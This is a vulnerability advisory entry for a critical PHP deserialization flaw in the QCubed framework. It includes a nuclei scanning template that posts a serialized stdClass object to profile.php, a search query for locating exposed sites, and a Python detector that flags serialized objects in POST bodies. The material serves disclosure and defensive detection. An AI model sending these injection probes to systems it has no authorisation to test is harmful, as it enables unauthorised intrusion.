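Vulnerability Information
Vulnerability name: QCubed PHP Object Injection Vulnerability
Vulnerability ID:
Vulnerability type: Deserialization
Severity: Critical
Description: QCubed is a PHP framework for rapid development of database-driven web applications. It is widely used across web development projects and provides a rich component library and tool set to support developer productivity. Typical deployments include enterprise services and common web application components.
This is a deserialization vulnerability. The root cause is that profile.php in the QCubed framework deserializes user-supplied POST data directly, without proper validation or filtering. An unauthenticated attacker can therefore send a crafted POST request to inject arbitrary PHP objects, leading to remote code execution.
The security risk is very high, because an attacker can execute arbitrary code remotely without any authentication and take full control of the affected system. An attacker can use the vulnerability to steal sensitive data, disrupt service stability, or move further into the internal network. Because exploitation is simple and can be automated, it poses a serious threat to every site running an affected version of the QCubed framework.
Vendor: QCubed
Product: QCubed
Affected versions: 3.1.1 and all versions
Search syntax: title="QCubed" || body="qcubed"
Source: https://github.com/projectdiscovery/nuclei-templates/blob/3c17057536e061b7c152e41c99d042917d33656f/http%2Fvulnerabilities%2Fphp%2Fqcubed-php-object-injection.yaml
Type: projectdiscovery/nuclei-templates:github issues
POC Details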
```yaml
id: qcubed-php-object-injection

info:
  name: QCubed PHP Object Injection (CVE-2020-24914)
  author: pranjal
  severity: critical
  description: |
    QCubed 3.1.1 and all versions contain a PHP object injection caused by unserializing untrusted POST data in profile.php, letting unauthenticated attackers execute arbitrary code via crafted POST requests.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24914
    - http://seclists.org/fulldisclosure/2021/Mar/28
    - https://tech.feedyourhead.at/content/QCubed-PHP-Object-Injection-CVE-2020-24914
    - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-01
  classification:
    cwe-id: CWE-502
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
  metadata:
    max-request: 2
    product: QCubed
    fofa-query: title="QCubed" || body="qcubed"
  tags: cve,cve2020,qcubed,php,object-injection,rce,kev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200'
          - 'contains(tolower(body), "qcubed") || contains(tolower(body), "qform")'
        condition: and
        internal: true

  - raw:
      - |
        POST /profile.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

        data=O:8:"stdClass":1:{s:4:"test";s:10:"{{randstr}}";}&action=save&id=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "stdClass"
          - "{{randstr}}"

      - type: status
        status:
          - 200

      - type: dsl
        dsl:
          - 'contains(body, "stdClass")'
          - 'contains(body, "{{randstr}}")'
        condition: and

    extractors:
      - type: regex
        part: body
        regex:
          - 'O:8:"stdClass":1:\{s:4:"test";s:\d+:"[^"]+";\}'
        internal: true
```
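A defender-side check for the request pattern this template sends, as an added example (not part of the nuclei template or of QCubed): it parses a form-encoded POST body and reports every parameter that carries a PHP serialized object. It goes beyond the raw data= case above by also handling URL-encoded, array-nested and base64-wrapped values. The function names and sample bodies are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl

# PHP serialize() object markers: O:<len>:"<Class>":<count>:{ and C:<len>:"<Class>":<len>:{
# A leading "+" on the length is tolerated because older PHP versions accepted it.
OBJECT_TOKEN = re.compile(r'(?:^|[;{])[OC]:\+?\d+:"([^"]+)":\d+:\{')


def _layers(value):
    """Yield the raw value and, when it is strict base64, the decoded text."""
    yield value
    try:
        decoded = base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return
    if decoded:
        yield decoded


def find_serialized_objects(body):
    """Return [(param, class_name), ...] for PHP objects in a form-encoded body."""
    hits = []
    for param, value in parse_qsl(body, keep_blank_values=True):
        for text in _layers(value):
            hits.extend((param, m.group(1)) for m in OBJECT_TOKEN.finditer(text))
    return hits


def should_alert(method, path, body):
    """Flag POST requests to profile.php that carry any serialized PHP object."""
    is_profile = path.split("?", 1)[0].endswith("/profile.php")
    return method.upper() == "POST" and is_profile and bool(find_serialized_objects(body))


# Constructed sample bodies (not captured traffic).
SAMPLES = [
    'data=O:8:"stdClass":1:{s:4:"test";s:3:"abc";}&action=save&id=1',  # raw, as in the template
    "data=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D&action=save",            # URL-encoded
    'data=a:1:{i:0;O:8:"stdClass":0:{}}',                              # object nested in an array
    'data=a:1:{i:0;s:3:"foo";}&action=save',                           # array of scalars: no object
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(should_alert("POST", "/profile.php", body), find_serialized_objects(body))
```

The check looks at any parameter name rather than only data, so it still fires if the vulnerable field is named differently in a given deployment.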